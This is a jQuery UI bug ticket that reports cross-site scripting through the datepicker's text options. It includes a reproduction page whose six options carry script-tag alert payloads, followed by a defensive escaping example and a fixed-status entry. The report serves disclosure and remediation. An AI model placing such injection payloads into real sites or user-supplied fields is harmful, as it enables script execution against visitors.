#15284 closed bug (fixed)
Opened March 23, 2018 03:11PM UTC
Closed May 25, 2021 08:58AM UTC
XSS Vulnerability on text options of jQuery UI datepicker
| Reported by: | andycyork | Owned by: | |
|---|---|---|---|
| Priority: | minor | Milestone: | none |
| Component: | ui.datepicker | Version: | 1.12.1 |
| Keywords: | | Cc: | |
| Blocked by: | | Blocking: | |
Description
Similar to https://github.com/jquery/api.jqueryui.com/issues/281 but applies to the datepicker.

**To recreate**

Create a new HTML page.

Inject this content into the new page:
```html
<!DOCTYPE html>
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
  <title>XSS in options of datepicker</title>
  <script src="https://code.jquery.com/jquery-3.3.1.js"></script>
  <script src="https://code.jquery.com/ui/1.12.1/jquery-ui.js"></script>
  <link rel="stylesheet" type="text/css" href="http://code.jquery.com/ui/1.12.1/themes/base/jquery-ui.css">
  <script>
    $(document).ready(function () {
      // Each *Text option is given markup instead of plain text.
      // The "<\/script>" spelling keeps the inline script block from closing early.
      $( "#datepicker" ).datepicker({
        showButtonPanel: true,
        showOn: "both",
        closeText: '<script>alert("closeText XSS")<\/script>',
        currentText: '<script>alert("currentText XSS")<\/script>',
        prevText: '<script>alert("prevText XSS")<\/script>',
        nextText: '<script>alert("nextText XSS")<\/script>',
        buttonText: '<script>alert("buttonText XSS")<\/script>',
        appendText: '<script>alert("appendText XSS")<\/script>'
      });
    });
  </script>
</head>
<body>
  <p>Date: <input type="text" id="datepicker"></p>
</body>
</html>
```
On load, alerts are shown for appendText and buttonText.

After clicking the input control, alerts are shown for closeText, currentText, prevText and nextText.

The scripted alerts should not be shown - an attacker can take advantage by injecting malicious XSS content into the website.
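The report shows the widget inserting its `*Text` options as raw markup. As an added example (not jQuery UI's own code and not part of the ticket), the following shows an application-side mitigation for the affected 1.12.1 behaviour: HTML-escape the six text options before handing them to `.datepicker()`, so the values render as literal text. `renderButtonMarkup` is a constructed, simplified stand-in for how a label ends up in string-built HTML, used only to make the before/after visible; the option values are the ones from the report above.

```javascript
// Added example: escape Datepicker *Text options before they reach the widget.
// Not jQuery UI code; renderButtonMarkup is a constructed stand-in for the
// widget's real template.

// The six options named in the report, all written into generated markup.
const DATEPICKER_TEXT_OPTIONS = [
  "closeText", "currentText", "prevText", "nextText", "buttonText", "appendText",
];

// Escape the characters that can change meaning in HTML text or attributes.
// "&" is replaced first so later replacements are not double-escaped.
function escapeHtml(value) {
  return String(value)
    .replace(/&/g, "&amp;")
    .replace(/</g, "&lt;")
    .replace(/>/g, "&gt;")
    .replace(/"/g, "&quot;")
    .replace(/'/g, "&#39;");
}

// Return a copy of the options with every *Text option escaped.
// Non-string values (undefined, numbers) pass through untouched.
function sanitizeDatepickerTextOptions(options) {
  const safe = Object.assign({}, options);
  for (const name of DATEPICKER_TEXT_OPTIONS) {
    if (typeof safe[name] === "string") {
      safe[name] = escapeHtml(safe[name]);
    }
  }
  return safe;
}

// Constructed stand-in for a label concatenated into an HTML string.
function renderButtonMarkup(label) {
  return '<button type="button" class="ui-datepicker-close">' + label + "</button>";
}

// True when the markup still contains a <script ...> start tag, i.e. the
// label was interpreted as HTML rather than as text.
function containsScriptTag(markup) {
  return /<script\b/i.test(markup);
}

// Constructed sample input: the same values the report's page uses.
const untrustedOptions = {
  showButtonPanel: true,
  showOn: "both",
  closeText: '<script>alert("closeText XSS")<\/script>',
  buttonText: '<script>alert("buttonText XSS")<\/script>',
};

const safeOptions = sanitizeDatepickerTextOptions(untrustedOptions);

// In a page this would be: $("#datepicker").datepicker(safeOptions);
console.log(renderButtonMarkup(untrustedOptions.closeText)); // script tag survives
console.log(renderButtonMarkup(safeOptions.closeText));      // shown as literal text
```

This pre-escaping is only right while the widget inserts the options as HTML. Once the widget treats them as text (the change linked in the history below), escaped values would be displayed with the entities visible, so drop the wrapper when upgrading rather than stacking the two.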
Attachments (0)
Change History (1)
Changed May 25, 2021 08:58AM UTC (comment:1)
| resolution: | → fixed |
|---|---|
| status: | new → closed |
Fixed in https://github.com/jquery/jquery-ui/pull/1953